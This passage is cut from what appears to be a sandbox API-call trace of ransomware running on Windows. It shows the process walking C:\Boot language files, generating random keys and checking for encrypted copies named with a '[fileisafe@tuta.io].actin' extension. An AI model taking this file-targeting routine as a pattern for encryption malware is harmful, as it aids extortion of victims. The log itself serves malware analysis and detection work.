lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=99744) returned 1 [0058.765] CloseHandle (hObject=0x2e4) returned 1 [0058.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll")) returned 0x20 [0058.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\bootvhd.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.766] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.766] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.766] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.766] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=76632) returned 1 [0058.766] CloseHandle (hObject=0x2e4) returned 1 [0058.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0058.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.766] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.766] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.766] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.767] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45472) returned 1 [0058.767] CloseHandle (hObject=0x2e4) returned 1 [0058.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui")) returned 0x20 [0058.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.767] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.767] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.767] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.767] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=75616) returned 1 [0058.767] CloseHandle (hObject=0x2e4) returned 1 [0058.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0058.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.768] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.768] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.768] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.768] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45472) returned 1 [0058.768] CloseHandle (hObject=0x2e4) returned 1 [0058.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui")) returned 0x20 [0058.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.768] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.768] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.768] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.769] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=79200) returned 1 [0058.769] CloseHandle (hObject=0x2e4) returned 1 [0058.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0058.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.769] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.769] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.769] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.769] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45984) returned 1 [0058.769] CloseHandle (hObject=0x2e4) returned 1 [0058.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui")) returned 0x20 [0058.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.769] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.770] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.770] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.770] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=80224) returned 1 [0058.770] CloseHandle (hObject=0x2e4) returned 1 [0058.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0058.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.770] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.770] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0058.770] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0058.771] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=46496) returned 1 [0058.771] CloseHandle (hObject=0x2e4) returned 1 [0058.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui")) returned 0x20 [0058.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0058.771] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.573] SetEvent (hEvent=0x2e8) returned 1 [0059.574] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.574] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.574] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45472) returned 1 [0059.574] CloseHandle (hObject=0x300) returned 1 [0059.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui")) returned 0x20 [0059.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.574] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.574] SetEvent (hEvent=0x2e8) returned 1 [0059.574] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.574] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.574] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=78176) returned 1 [0059.575] CloseHandle (hObject=0x300) returned 1 [0059.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0059.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.575] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.575] SetEvent (hEvent=0x2e8) returned 1 [0059.575] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.575] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.575] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45472) returned 1 [0059.575] CloseHandle (hObject=0x300) returned 1 [0059.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui")) returned 0x20 [0059.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.575] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.575] SetEvent (hEvent=0x2e8) returned 1 [0059.576] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.576] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.576] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77656) returned 1 [0059.576] CloseHandle (hObject=0x300) returned 1 [0059.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0059.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.576] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.576] SetEvent (hEvent=0x2e8) returned 1 [0059.576] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.576] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.577] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45984) returned 1 [0059.577] CloseHandle (hObject=0x300) returned 1 [0059.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui")) returned 0x20 [0059.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.577] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.577] SetEvent (hEvent=0x2e8) returned 1 [0059.578] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.578] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0059.578] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=76640) returned 1 [0059.578] CloseHandle (hObject=0x330) returned 1 [0059.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0059.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.579] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.579] SetEvent (hEvent=0x2e8) returned 1 [0059.579] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.579] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0059.579] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45472) returned 1 [0059.579] CloseHandle (hObject=0x330) returned 1 [0059.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui")) returned 0x20 [0059.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.579] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.580] SetEvent (hEvent=0x2e8) returned 1 [0059.580] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.580] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0059.580] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=76640) returned 1 [0059.580] CloseHandle (hObject=0x330) returned 1 [0059.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0059.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.584] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.584] SetEvent (hEvent=0x2e8) returned 1 [0059.584] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.584] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0059.584] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45984) returned 1 [0059.584] CloseHandle (hObject=0x330) returned 1 [0059.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui")) returned 0x20 [0059.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.585] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.585] SetEvent (hEvent=0x2e8) returned 1 [0059.585] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.585] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.585] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=74080) returned 1 [0059.585] CloseHandle (hObject=0x300) returned 1 [0059.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui")) returned 0x20 [0059.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.585] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.585] SetEvent (hEvent=0x2e8) returned 1 [0059.586] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.586] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.586] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=54168) returned 1 [0059.586] CloseHandle (hObject=0x300) returned 1 [0059.586] 